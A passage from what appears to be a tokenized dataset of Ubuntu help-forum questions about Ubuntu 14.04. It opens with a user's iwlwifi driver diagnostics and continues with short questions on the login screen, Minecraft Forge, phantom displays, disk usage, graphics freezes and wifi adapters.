iwlwifi-6000-4.ucode firmware : iwlwifi-7265-7.ucode firmware : iwlwifi-3160-7.ucode firmware : iwlwifi-7260-7.ucode srcversion : 5aa2e0fde335b45c3f44ae0 alias : pci : v00008086d0000095asv*sd00005490bc*sc*i* alias : pci : v00008086d0000095bsv*sd00005290bc*sc*i* alias : pci : v00008086d0000095asv*sd00005590bc*sc*i* alias : pci : v00008086d0000095asv*sd00005190bc*sc*i* alias : pci : v00008086d0000095asv*sd00005090bc*sc*i* alias : pci : v00008086d0000095asv*sd00005420bc*sc*i* alias : pci : v00008086d0000095asv*sd0000502abc*sc*i* alias : pci : v00008086d0000095asv*sd00005020bc*sc*i* alias : pci : v00008086d0000095asv*sd00009410bc*sc*i* alias : pci : v00008086d0000095asv*sd00009310bc*sc*i* alias : pci : v00008086d0000095asv*sd00009510bc*sc*i* alias : pci : v00008086d0000095asv*sd00009200bc*sc*i* alias : pci : v00008086d0000095asv*sd00009210bc*sc*i* alias : pci : v00008086d0000095asv*sd00009112bc*sc*i* alias : pci : v00008086d0000095asv*sd00009110bc*sc*i* alias : pci : v00008086d0000095asv*sd00009012bc*sc*i* alias : pci : v00008086d0000095asv*sd00009010bc*sc*i* alias : pci : v00008086d0000095bsv*sd00005202bc*sc*i* alias : pci : v00008086d0000095asv*sd00005102bc*sc*i* alias : pci : v00008086d0000095asv*sd00005002bc*sc*i* alias : pci : v00008086d0000095bsv*sd00005200bc*sc*i* alias : pci : v00008086d0000095asv*sd0000500abc*sc*i* alias : pci : v00008086d0000095asv*sd00005000bc*sc*i* alias : pci : v00008086d0000095asv*sd00001010bc*sc*i* alias : pci : v00008086d0000095asv*sd00005400bc*sc*i* alias : pci : v00008086d0000095asv*sd00005410bc*sc*i* alias : pci : v00008086d0000095asv*sd00005012bc*sc*i* alias : pci : v00008086d0000095bsv*sd00005210bc*sc*i* alias : pci : v00008086d0000095bsv*sd00005302bc*sc*i* alias : pci : v00008086d0000095bsv*sd00005310bc*sc*i* alias : pci : v00008086d0000095asv*sd0000510abc*sc*i* alias : pci : v00008086d0000095asv*sd00005100bc*sc*i* alias : pci : v00008086d0000095asv*sd00005112bc*sc*i* alias : pci : v00008086d0000095asv*sd00005110bc*sc*i* alias : pci : v00008086d0000095asv*sd00005010bc*sc*i* alias : pci : v00008086d000008b3sv*sd00008570bc*sc*i* alias : pci : v00008086d000008b3sv*sd00008470bc*sc*i* alias : pci : v00008086d000008b4sv*sd00008270bc*sc*i* alias : pci : v00008086d000008b3sv*sd00008062bc*sc*i* alias : pci : v00008086d000008b3sv*sd00008060bc*sc*i* alias : pci : v00008086d000008b3sv*sd00008172bc*sc*i* alias : pci : v00008086d000008b3sv*sd00008170bc*sc*i* alias : pci : v00008086d000008b3sv*sd00008072bc*sc*i* alias : pci : v00008086d000008b3sv*sd00008070bc*sc*i* alias : pci : v00008086d000008b4sv*sd00000370bc*sc*i* alias : pci : v00008086d000008b3sv*sd00000472bc*sc*i* alias : pci : v00008086d000008b3sv*sd00000470bc*sc*i* alias : pci : v00008086d000008b4sv*sd00000272bc*sc*i* alias : pci : v00008086d000008b4sv*sd00000270bc*sc*i* alias : pci : v00008086d000008b3sv*sd00000062bc*sc*i* alias : pci : v00008086d000008b3sv*sd00000060bc*sc*i* alias : pci : v00008086d000008b3sv*sd00000172bc*sc*i* alias : pci : v00008086d000008b3sv*sd00000170bc*sc*i* alias : pci : v00008086d000008b3sv*sd00000072bc*sc*i* alias : pci : v00008086d000008b3sv*sd00000070bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c420bc*sc*i* alias : pci : v00008086d000008b2sv*sd0000c220bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c02abc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c020bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c360bc*sc*i* alias : pci : v00008086d000008b2sv*sd0000c370bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c560bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c570bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c462bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c460bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c472bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c470bc*sc*i* alias : pci : v00008086d000008b2sv*sd0000c262bc*sc*i* alias : pci : v00008086d000008b2sv*sd0000c26abc*sc*i* alias : pci : v00008086d000008b2sv*sd0000c260bc*sc*i* alias : pci : v00008086d000008b2sv*sd0000c272bc*sc*i* alias : pci : v00008086d000008b2sv*sd0000c270bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c760bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c770bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c162bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c062bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c160bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c06abc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c060bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c170bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c072bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c070bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004420bc*sc*i* alias : pci : v00008086d000008b2sv*sd00004220bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000402abc*sc*i* alias : pci : v00008086d000008b1sv*sd00004020bc*sc*i* alias : pci : v00008086d000008b1sv*sd00005070bc*sc*i* alias : pci : v00008086d000008b2sv*sd00004360bc*sc*i* alias : pci : v00008086d000008b2sv*sd00004370bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004560bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004570bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004a6cbc*sc*i* alias : pci : v00008086d000008b1sv*sd00004a6ebc*sc*i* alias : pci : v00008086d000008b1sv*sd00004a70bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000486ebc*sc*i* alias : pci : v00008086d000008b1sv*sd00004870bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004462bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000446abc*sc*i* alias : pci : v00008086d000008b1sv*sd00004460bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004472bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004470bc*sc*i* alias : pci : v00008086d000008b2sv*sd00004262bc*sc*i* alias : pci : v00008086d000008b2sv*sd0000426abc*sc*i* alias : pci : v00008086d000008b2sv*sd00004260bc*sc*i* alias : pci : v00008086d000008b2sv*sd00004272bc*sc*i* alias : pci : v00008086d000008b2sv*sd00004270bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004162bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004062bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004160bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000406abc*sc*i* alias : pci : v00008086d000008b1sv*sd00004060bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004170bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004072bc*sc*i* alias : pci : v00008086d000008b1sv*sd00004070bc*sc*i* alias : pci : v00008086d00000892sv*sd00000462bc*sc*i* alias : pci : v00008086d00000893sv*sd00000262bc*sc*i* alias : pci : v00008086d00000892sv*sd00000062bc*sc*i* alias : pci : v00008086d00000894sv*sd00000822bc*sc*i* alias : pci : v00008086d00000894sv*sd00000422bc*sc*i* alias : pci : v00008086d00000895sv*sd00000222bc*sc*i* alias : pci : v00008086d00000894sv*sd00000022bc*sc*i* alias : pci : v00008086d0000088fsv*sd00005260bc*sc*i* alias : pci : v00008086d0000088esv*sd00004860bc*sc*i* alias : pci : v00008086d0000088esv*sd0000446abc*sc*i* alias : pci : v00008086d0000088esv*sd00004460bc*sc*i* alias : pci : v00008086d0000088fsv*sd0000426abc*sc*i* alias : pci : v00008086d0000088fsv*sd00004260bc*sc*i* alias : pci : v00008086d0000088esv*sd0000406abc*sc*i* alias : pci : v00008086d0000088esv*sd00004060bc*sc*i* alias : pci : v00008086d00000887sv*sd00004462bc*sc*i* alias : pci : v00008086d00000888sv*sd00004262bc*sc*i* alias : pci : v00008086d00000887sv*sd00004062bc*sc*i* alias : pci : v00008086d00000890sv*sd00004822bc*sc*i* alias : pci : v00008086d00000890sv*sd00004422bc*sc*i* alias : pci : v00008086d00000891sv*sd00004222bc*sc*i* alias : pci : v00008086d00000890sv*sd00004022bc*sc*i* alias : pci : v00008086d00000896sv*sd00005027bc*sc*i* alias : pci : v00008086d00000896sv*sd00005025bc*sc*i* alias : pci : v00008086d00000897sv*sd00005017bc*sc*i* alias : pci : v00008086d00000897sv*sd00005015bc*sc*i* alias : pci : v00008086d00000896sv*sd00005007bc*sc*i* alias : pci : v00008086d00000896sv*sd00005005bc*sc*i* alias : pci : v00008086d000008aesv*sd00001027bc*sc*i* alias : pci : v00008086d000008aesv*sd00001025bc*sc*i* alias : pci : v00008086d000008afsv*sd00001017bc*sc*i* alias : pci : v00008086d000008afsv*sd00001015bc*sc*i* alias : pci : v00008086d000008aesv*sd00001007bc*sc*i* alias : pci : v00008086d000008aesv*sd00001005bc*sc*i* alias : pci : v00008086d00000084sv*sd00001316bc*sc*i* alias : pci : v00008086d00000084sv*sd00001216bc*sc*i* alias : pci : v00008086d00000083sv*sd00001326bc*sc*i* alias : pci : v00008086d00000083sv*sd00001226bc*sc*i* alias : pci : v00008086d00000083sv*sd00001306bc*sc*i* alias : pci : v00008086d00000083sv*sd00001206bc*sc*i* alias : pci : v00008086d00000084sv*sd00001315bc*sc*i* alias : pci : v00008086d00000084sv*sd00001215bc*sc*i* alias : pci : v00008086d00000083sv*sd00001325bc*sc*i* alias : pci : v00008086d00000083sv*sd00001225bc*sc*i* alias : pci : v00008086d00000083sv*sd00001305bc*sc*i* alias : pci : v00008086d00000083sv*sd00001205bc*sc*i* alias : pci : v00008086d00000886sv*sd00001317bc*sc*i* alias : pci : v00008086d00000886sv*sd00001315bc*sc*i* alias : pci : v00008086d00000885sv*sd00001327bc*sc*i* alias : pci : v00008086d00000885sv*sd00001325bc*sc*i* alias : pci : v00008086d00000885sv*sd00001307bc*sc*i* alias : pci : v00008086d00000885sv*sd00001305bc*sc*i* alias : pci : v00008086d00000089sv*sd00001316bc*sc*i* alias : pci : v00008086d00000089sv*sd00001311bc*sc*i* alias : pci : v00008086d00000087sv*sd00001326bc*sc*i* alias : pci : v00008086d00000087sv*sd00001321bc*sc*i* alias : pci : v00008086d00000087sv*sd00001306bc*sc*i* alias : pci : v00008086d00000087sv*sd00001301bc*sc*i* alias : pci : v00008086d00000091sv*sd00005226bc*sc*i* alias : pci : v00008086d00000091sv*sd00005225bc*sc*i* alias : pci : v00008086d00000091sv*sd00005221bc*sc*i* alias : pci : v00008086d00000091sv*sd00005207bc*sc*i* alias : pci : v00008086d00000091sv*sd00005206bc*sc*i* alias : pci : v00008086d00000091sv*sd00005205bc*sc*i* alias : pci : v00008086d00000091sv*sd00005201bc*sc*i* alias : pci : v00008086d00000090sv*sd00005216bc*sc*i* alias : pci : v00008086d00000090sv*sd00005215bc*sc*i* alias : pci : v00008086d00000090sv*sd00005211bc*sc*i* alias : pci : v00008086d0000008bsv*sd00005317bc*sc*i* alias : pci : v00008086d0000008bsv*sd00005315bc*sc*i* alias : pci : v00008086d0000008asv*sd00005327bc*sc*i* alias : pci : v00008086d0000008asv*sd00005325bc*sc*i* alias : pci : v00008086d0000008asv*sd00005307bc*sc*i* alias : pci : v00008086d0000008asv*sd00005305bc*sc*i* alias : pci : v00008086d00000082sv*sd00001305bc*sc*i* alias : pci : v00008086d00000082sv*sd00001304bc*sc*i* alias : pci : v00008086d00000082sv*sd00004820bc*sc*i* alias : pci : v00008086d00000085sv*sd0000c228bc*sc*i* alias : pci : v00008086d00000085sv*sd0000c220bc*sc*i* alias : pci : v00008086d00000082sv*sd0000c020bc*sc*i* alias : pci : v00008086d00000085sv*sd00001316bc*sc*i* alias : pci : v00008086d00000085sv*sd00001318bc*sc*i* alias : pci : v00008086d00000085sv*sd00001311bc*sc*i* alias : pci : v00008086d00000082sv*sd00001328bc*sc*i* alias : pci : v00008086d00000082sv*sd00001326bc*sc*i* alias : pci : v00008086d00000082sv*sd00001321bc*sc*i* alias : pci : v00008086d00000082sv*sd00001308bc*sc*i* alias : pci : v00008086d00000082sv*sd00001307bc*sc*i* alias : pci : v00008086d00000082sv*sd00001306bc*sc*i* alias : pci : v00008086d00000082sv*sd00001301bc*sc*i* alias : pci : v00008086d00004239sv*sd00001316bc*sc*i* alias : pci : v00008086d00004239sv*sd00001311bc*sc*i* alias : pci : v00008086d00004238sv*sd00001118bc*sc*i* alias : pci : v00008086d00004238sv*sd00001111bc*sc*i* alias : pci : v00008086d0000422csv*sd00001326bc*sc*i* alias : pci : v00008086d0000422csv*sd00001321bc*sc*i* alias : pci : v00008086d0000422csv*sd00001307bc*sc*i* alias : pci : v00008086d0000422csv*sd00001306bc*sc*i* alias : pci : v00008086d0000422csv*sd00001301bc*sc*i* alias : pci : v00008086d0000422bsv*sd00001128bc*sc*i* alias : pci : v00008086d0000422bsv*sd00001121bc*sc*i* alias : pci : v00008086d0000422bsv*sd00001108bc*sc*i* alias : pci : v00008086d0000422bsv*sd00001101bc*sc*i* alias : pci : v00008086d0000423dsv*sd00001316bc*sc*i* alias : pci : v00008086d0000423dsv*sd00001216bc*sc*i* alias : pci : v00008086d0000423dsv*sd00001311bc*sc*i* alias : pci : v00008086d0000423dsv*sd00001211bc*sc*i* alias : pci : v00008086d0000423csv*sd00001326bc*sc*i* alias : pci : v00008086d0000423csv*sd00001321bc*sc*i* alias : pci : v00008086d0000423csv*sd00001221bc*sc*i* alias : pci : v00008086d0000423csv*sd00001306bc*sc*i* alias : pci : v00008086d0000423csv*sd00001206bc*sc*i* alias : pci : v00008086d0000423csv*sd00001301bc*sc*i* alias : pci : v00008086d0000423csv*sd00001201bc*sc*i* alias : pci : v00008086d0000423bsv*sd00001011bc*sc*i* alias : pci : v00008086d0000423asv*sd00001021bc*sc*i* alias : pci : v00008086d0000423asv*sd00001001bc*sc*i* alias : pci : v00008086d00004236sv*sd00001114bc*sc*i* alias : pci : v00008086d00004236sv*sd00001014bc*sc*i* alias : pci : v00008086d00004236sv*sd00001111bc*sc*i* alias : pci : v00008086d00004236sv*sd00001011bc*sc*i* alias : pci : v00008086d00004235sv*sd00001104bc*sc*i* alias : pci : v00008086d00004235sv*sd00001004bc*sc*i* alias : pci : v00008086d00004235sv*sd00001101bc*sc*i* alias : pci : v00008086d00004235sv*sd00001001bc*sc*i* alias : pci : v00008086d00004235sv*sd00001124bc*sc*i* alias : pci : v00008086d00004235sv*sd00001024bc*sc*i* alias : pci : v00008086d00004235sv*sd00001121bc*sc*i* alias : pci : v00008086d00004235sv*sd00001021bc*sc*i* alias : pci : v00008086d00004237sv*sd00001316bc*sc*i* alias : pci : v00008086d00004237sv*sd00001216bc*sc*i* alias : pci : v00008086d00004237sv*sd00001315bc*sc*i* alias : pci : v00008086d00004237sv*sd00001215bc*sc*i* alias : pci : v00008086d00004237sv*sd00001314bc*sc*i* alias : pci : v00008086d00004237sv*sd00001214bc*sc*i* alias : pci : v00008086d00004237sv*sd00001311bc*sc*i* alias : pci : v00008086d00004237sv*sd00001211bc*sc*i* alias : pci : v00008086d00004232sv*sd00001326bc*sc*i* alias : pci : v00008086d00004232sv*sd00001226bc*sc*i* alias : pci : v00008086d00004232sv*sd00001325bc*sc*i* alias : pci : v00008086d00004232sv*sd00001225bc*sc*i* alias : pci : v00008086d00004232sv*sd00001324bc*sc*i* alias : pci : v00008086d00004232sv*sd00001224bc*sc*i* alias : pci : v00008086d00004232sv*sd00001321bc*sc*i* alias : pci : v00008086d00004232sv*sd00001221bc*sc*i* alias : pci : v00008086d00004232sv*sd00001306bc*sc*i* alias : pci : v00008086d00004232sv*sd00001206bc*sc*i* alias : pci : v00008086d00004232sv*sd00001305bc*sc*i* alias : pci : v00008086d00004232sv*sd00001205bc*sc*i* alias : pci : v00008086d00004232sv*sd00001304bc*sc*i* alias : pci : v00008086d00004232sv*sd00001204bc*sc*i* alias : pci : v00008086d00004232sv*sd00001301bc*sc*i* alias : pci : v00008086d00004232sv*sd00001201bc*sc*i* depends : cfg80211 intree : y vermagic : 3.13.0-32-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : 5e:3c:0f:9c : a6 : e3:65:43:53:5f : a2 : bb:5b:70:9e:84 : f1:6d : a7 : c7 sig_hashalgo : sha512 parm : swcrypto : using crypto in software ( default 0 [ hardware ] ) ( int ) parm : 11n_disable : disable 11n functionality , bitmap : 1 : full , 2 : disable agg tx , 4 : disable agg rx , 8 enable agg tx ( uint ) parm : amsdu_size_8k : enable 8k amsdu size ( default 0 ) ( int ) parm : fw_restart : restart firmware in case of error ( default true ) ( bool ) parm : antenna_coupling : specify antenna coupling in db ( defualt : 0 db ) ( int ) parm : wd_disable : disable stuck queue watchdog timer 0=system default , 1=disable , 2=enable ( default : 0 ) ( int ) parm : nvm_file : nvm file name ( charp ) parm : bt_coex_active : enable wifi/bt co-exist ( default : enable ) ( bool ) parm : led_mode:0=system default , 1=on ( rf on ) /off ( rf off ) , 2=blinking , 3=off ( default : 0 ) ( int ) parm : power_save : enable wifi power management ( default : disable ) ( bool ) parm : power_level : default power save level ( range from 1 - 5 , default : 1 ) ( int ) next up , grep on iwlwifi gave me nothing laurence @ s : ~ $ dmesg | grep iwlwifi laurence @ s : ~ $ grep on `` intel '' says : laurence @ s : ~ $ dmesg | grep intel [ 0.650199 ] intel_idle : mwait substates : 0x11142120 [ 0.650200 ] intel_idle : v0.4 model 0x45 [ 0.650201 ] intel_idle : lapic_timer_reliable_states 0xffffffff [ 0.764029 ] fb : conflicting fb hw usage inteldrmfb vs efi vga - removing generic driver [ 0.894199 ] fbcon : inteldrmfb ( fb0 ) is primary device [ 2.497821 ] i915 0000:00:02.0 : fb0 : inteldrmfb frame buffer device [ 10.221537 ] snd_hda_intel 0000:00:1b.0 : irq 60 for msi/msi-x [ 10.227958 ] snd_hda_intel 0000:00:03.0 : irq 61 for msi/msi-x [ 10.342563 ] bluetooth : hci0 : intel bluetooth firmware file : intel/ibt-hw-37.7.10-fw-1.80.1.2d.d.bseq [ 10.480130 ] intel_rapl : domain uncore energy ctr 4206:4206 not working , skip [ 5255.145127 ] snd_hda_intel 0000:00:03.0 : irq 56 for msi/msi-x [ 5255.145974 ] snd_hda_intel 0000:00:1b.0 : irq 61 for msi/msi-x [ 5257.167043 ] bluetooth : hci0 : intel bluetooth firmware file : intel/ibt-hw-37.7.10-fw-1.80.1.2d.d.bseq [ 5266.265207 ] snd_hda_intel 0000:00:03.0 : irq 60 for msi/msi-x [ 5266.265521 ] snd_hda_intel 0000:00:1b.0 : irq 61 for msi/msi-x [ 5267.966360 ] bluetooth : hci0 : intel bluetooth firmware file : intel/ibt-hw-37.7.10-fw-1.80.1.2d.d.bseq [ 7142.242539 ] snd_hda_intel 0000:00:03.0 : irq 56 for msi/msi-x [ 7142.243320 ] snd_hda_intel 0000:00:1b.0 : irq 61 for msi/msi-x [ 7144.204721 ] bluetooth : hci0 : intel bluetooth firmware file : intel/ibt-hw-37.7.10-fw-1.80.1.2d.d.bseq lsmod says : laurence @ s : ~ $ lsmod | grep iwl iwlmvm 189774 0 iwlwifi 169932 1 iwlmvm mac80211 630653 1 iwlmvm cfg80211 484040 3 iwlwifi , mac80211 , iwlmvm lshw says : laurence @ s : ~ $ sudo lshw -c network [ sudo ] password for laurence : *-network unclaimed description : network controller product : wireless 7260 vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : cb width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f7c00000-f7c01fff *-network description : ethernet interface physical id : 1 logical name : eth0 serial : e0:00:00:10:3e : a4 size : 100mbit/s capacity : 100mbit/s capabilities : ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=asix driverversion=22-dec-2011 duplex=full firmware=asix ax88772b usb 2.0 ethernet ip=192.168.1.13 link=yes multicast=yes port=mii speed=100mbit/s i 've been battling this for three days and i just ca n't figure it out . i 've gotten wifi to work on laptops over the years , but i 've finally met my match . if you have any thoughts/ideas/anything to offer . if i ca n't get it working within the next day or two i 'm going to have to take the machine back ... which sucks because i really like it ( other than the wifi ) .
504697	ubuntu 14.04 lts login manager	so here is the problem that i am having . i came back to ubuntu from manjaro linux and enjoy the beautiful design . i was always a fan of the login screen/manager for ubuntu . it was very sleek looking but i 'm not sure what the official name of it was/is . with the new install of 14.04 i have noticed that all i get at the login screen is my username to login and a boring gray and noisy background . i do n't recognize this login manager but everything is centered and kinda boring . how do i get back to the original , fancy ubuntu login manager ? thanks ! any help is appreciated !
504702	how do i install minecraft forge on xubuntu 14.04	i have successfully installed and used minecraft on my xubuntu os , but for some reason none of the tutorials on how to use minecraft forge have worked for me . i take the forge files and put them into minecraft.jar using archive manager , but when i go to open minecraft , literally nothing happens . minecraft wo n't even open anymore . i have tried uninstalling and reinstalling both , but minecraft stops working after i install forge . does anyone have any ideas on how to get this working ? has anyone else got this working on xubuntu 14.04 ? thank you for your answers .
504705	nonexistent display ( unknown display ) messing things up	i 've been cracking my head with this one all day , read all there is to be read around the issue ( not much to be found on it to be honest : some questions , some blog posts and some unresolved tickets ) but i ca n't seem to find a solution . i`ve installed ubuntu 14.04 today , upgrading from 12.10 and right out of the box i noticed in the display settings that it detect a 3rd display that i do not have hooked up to my laptop ( that was not there in 12.10 ) . i have a samsung syncmaster and the laptop display , but ubuntu decided to place another unknown display next to them ( or sometimes over and under them so you ca n't move them around ) . long story short is that i`m trying to configure nvidia and that unknown display is quite the issue . i need a way to make ubuntu not detect that and not place it there . i`ve tried finding the name ubuntu detects it as using xrandr and then removing it from the grub as mentioned here , but that did n't work for me . some input on tackling this issue will be rewarded in beer . cheers ! edit : ok so it seems they are working on it , there is an active ticket about this issue here . they released a fix in the proposed updates ubuntu-drivers-common package . i 've installed it and the phantom display is gone . edit2 : i 've uninstalled the nvidia driver and went back to nouveau . the unknown display is back . running xrandr -q told me that the ghost display renamed itself from vga-0 to vga-1-2 . removing it from grub now and will report if it`s gone . edit3 : its still there.. in the changelog for the ubuntu-drivers-common it says `` ignore crt displays when using prime . this works around systems whose bios provides a ghost output ( lp : # 1296020 ) . `` , so im gon na go ahead and reinstall the nvidia driver . edit4 : right , so after installing the nvidia drivers the phantom display is gone . i 've reached my goal to be able to comfigure nvidia . hope this post helps . cheers .
504706	is there a way to get a list of all folders on a harddrive with the amount of used space ?	somehow my harddrive is full and i ca n't find the source , so is there a way to get a list of all folders on a harddrive with the amount of used space ? i could do it manually and check the properties of each folder , but this would be too much work . i use ubuntu 14.04
504709	the system freezes : black screen with color blocks	the system freezes randomly and the screen turns black , with a lot of color blocks flashing . i just can turn off the computer with the power button . i 'm working with a laptop dell studio 1558 , i5 processor , 64 bits , 4 gb ram , and ati hd5470 . is a problem of graphic card drivers ? ? ?
504713	teamspeak only launches when i run the script through the terminal	i have just set up my dual boot and i 'm still getting used to ubuntu . i 'm using ubuntu 14.04 lts and i 'm trying to run teamspeak . i could n't get it to work by launching the executable file , nothing happened . i tried clicking the script . that did n't work . i tried making so they were allowed to execute as a program with no luck . the only way to get it to work was manually going through terminal and running the script . is there an easier way to do this ?
504714	awesome wm with xubuntu - setting wallpaper resets to default	i am using awesome v3.4.15 ( never gon na give you up ) and ( x ) ubuntu . my display manager is lightdm . in /etc/xdg/awesome/rc.lua i 've added this line to change my background to a solid color : theme.wallpaper_cmd = { `` hsetroot -solid ' # 000000 ' '' } however , my wallpaper is always set to the default blue wallpaper on a reboot - even after pressing mod+ctrl+r , which reloads the config file by restarting awesome . when i execute hsetroot -solid ' # 000000 ' itself , it works like a charm . reloading the config does n't change anything , the background then stays the desired fixed color . to reload my config , i 've got the default command in my rc.lua : awful.key ( { modkey , `` control '' } , `` r '' , awesome.restart ) my greeting login screen , which has the same wallpaper as the default blue desktop , is specified in /etc/lightdm/lightdm-gtk-greeter-ubuntu.conf and contains a line saying where this wallpaper is stored : [ greeter ] background=/lib/plymouth/themes/xubuntu-logo/wallpaper.png # background= # 000000 i changed it from # 000000 back to the default [ ... ] /wallpaper.png , after i 've found out that switching from my user to guest/other in the menu of the said greeter resulted in the wallpaper being switched to a black wallpaper - the one specified in /etc/lightdm/lightdm-gtk-greeter-ubuntu.conf . this is weird , because why does n't this happen , when i select my user name in the menu , but with all other accounts ? if i switch the background setting back to the default value [ ... ] /wallpaper.png , then selecting guest/other accounts in the menu results in the wallpaper being shown . it has a minor difference , though , to the default blue wallpaper i am having trouble with getting rid off : it does n't have the weird 6-dots logo , which can be seen here again . so it is just the raw picture , that is located at /lib/plymouth/themes/xubuntu-logo/wallpaper.png . why does n't my background change to black , when setting background= # 000000 in /etc/lightdm/lightdm-gtk-greeter-ubuntu.conf ? where does this extra 6-dots logo come from ? why is my config not reloaded when pressing mod+ctrl+r , resulting in the wallpaper_cmd to be executed ? other than awesome.restart , how can i reload my awesome config to test it ?
504718	wlan0 not showing up ... . mediatek corp. mt7630e 802.11bgn wireless	here is what when i type ifconfig eth0 link encap : ethernet hwaddr a0:48:1c:0a:47 : f3 inet addr:192.168.25.186 bcast:192.168.25.255 mask:255.255.255.0 inet6 addr : fe80 : :a248:1cff : fe0a:47f3/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:41528 errors:0 dropped:0 overruns:0 frame:0 tx packets:16348 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:23075826 ( 23.0 mb ) tx bytes:2128515 ( 2.1 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:1951 errors:0 dropped:0 overruns:0 frame:0 tx packets:1951 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:189033 ( 189.0 kb ) tx bytes:189033 ( 189.0 kb ) on typing lspci -nnk 00:00.0 host bridge [ 0600 ] : intel corporation haswell-ult dram controller [ 8086:0a04 ] ( rev 09 ) subsystem : hewlett-packard company device [ 103c:2164 ] 00:02.0 vga compatible controller [ 0300 ] : intel corporation haswell-ult integrated graphics controller [ 8086:0a16 ] ( rev 09 ) subsystem : hewlett-packard company device [ 103c:2164 ] kernel driver in use : i915 00:03.0 audio device [ 0403 ] : intel corporation haswell-ult hd audio controller [ 8086:0a0c ] ( rev 09 ) subsystem : hewlett-packard company device [ 103c:2164 ] kernel driver in use : snd_hda_intel 00:14.0 usb controller [ 0c03 ] : intel corporation lynx point-lp usb xhci hc [ 8086:9c31 ] ( rev 04 ) subsystem : hewlett-packard company device [ 103c:2164 ] kernel driver in use : xhci_hcd 00:16.0 communication controller [ 0780 ] : intel corporation lynx point-lp heci # 0 [ 8086:9c3a ] ( rev 04 ) subsystem : hewlett-packard company device [ 103c:2164 ] kernel driver in use : mei_me 00:1b.0 audio device [ 0403 ] : intel corporation lynx point-lp hd audio controller [ 8086:9c20 ] ( rev 04 ) subsystem : hewlett-packard company device [ 103c:2164 ] kernel driver in use : snd_hda_intel 00:1c.0 pci bridge [ 0604 ] : intel corporation lynx point-lp pci express root port 1 [ 8086:9c10 ] ( rev e4 ) kernel driver in use : pcieport 00:1c.1 pci bridge [ 0604 ] : intel corporation lynx point-lp pci express root port 2 [ 8086:9c12 ] ( rev e4 ) kernel driver in use : pcieport 00:1c.2 pci bridge [ 0604 ] : intel corporation lynx point-lp pci express root port 3 [ 8086:9c14 ] ( rev e4 ) kernel driver in use : pcieport 00:1c.3 pci bridge [ 0604 ] : intel corporation lynx point-lp pci express root port 4 [ 8086:9c16 ] ( rev e4 ) kernel driver in use : pcieport 00:1c.4 pci bridge [ 0604 ] : intel corporation lynx point-lp pci express root port 5 [ 8086:9c18 ] ( rev e4 ) kernel driver in use : pcieport 00:1d.0 usb controller [ 0c03 ] : intel corporation lynx point-lp usb ehci # 1 [ 8086:9c26 ] ( rev 04 ) subsystem : hewlett-packard company device [ 103c:2164 ] kernel driver in use : ehci-pci 00:1f.0 isa bridge [ 0601 ] : intel corporation lynx point-lp lpc controller [ 8086:9c43 ] ( rev 04 ) subsystem : hewlett-packard company device [ 103c:2164 ] kernel driver in use : lpc_ich 00:1f.2 sata controller [ 0106 ] : intel corporation lynx point-lp sata controller 1 [ ahci mode ] [ 8086:9c03 ] ( rev 04 ) subsystem : hewlett-packard company device [ 103c:2164 ] kernel driver in use : ahci 00:1f.3 smbus [ 0c05 ] : intel corporation lynx point-lp smbus controller [ 8086:9c22 ] ( rev 04 ) subsystem : hewlett-packard company device [ 103c:2164 ] 08:00.0 network controller [ 0280 ] : mediatek corp. mt7630e 802.11bgn wireless network adapter [ 14c3:7630 ] subsystem : hewlett-packard company device [ 103c:197c ] 09:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 08 ) subsystem : hewlett-packard company device [ 103c:2164 ] kernel driver in use : r8169 0a:00.0 display controller [ 0380 ] : advanced micro devices , inc. [ amd/ati ] sun xt [ radeon hd 8670a/8670m/8690m ] [ 1002:6660 ] ( rev ff ) kernel driver in use : radeon
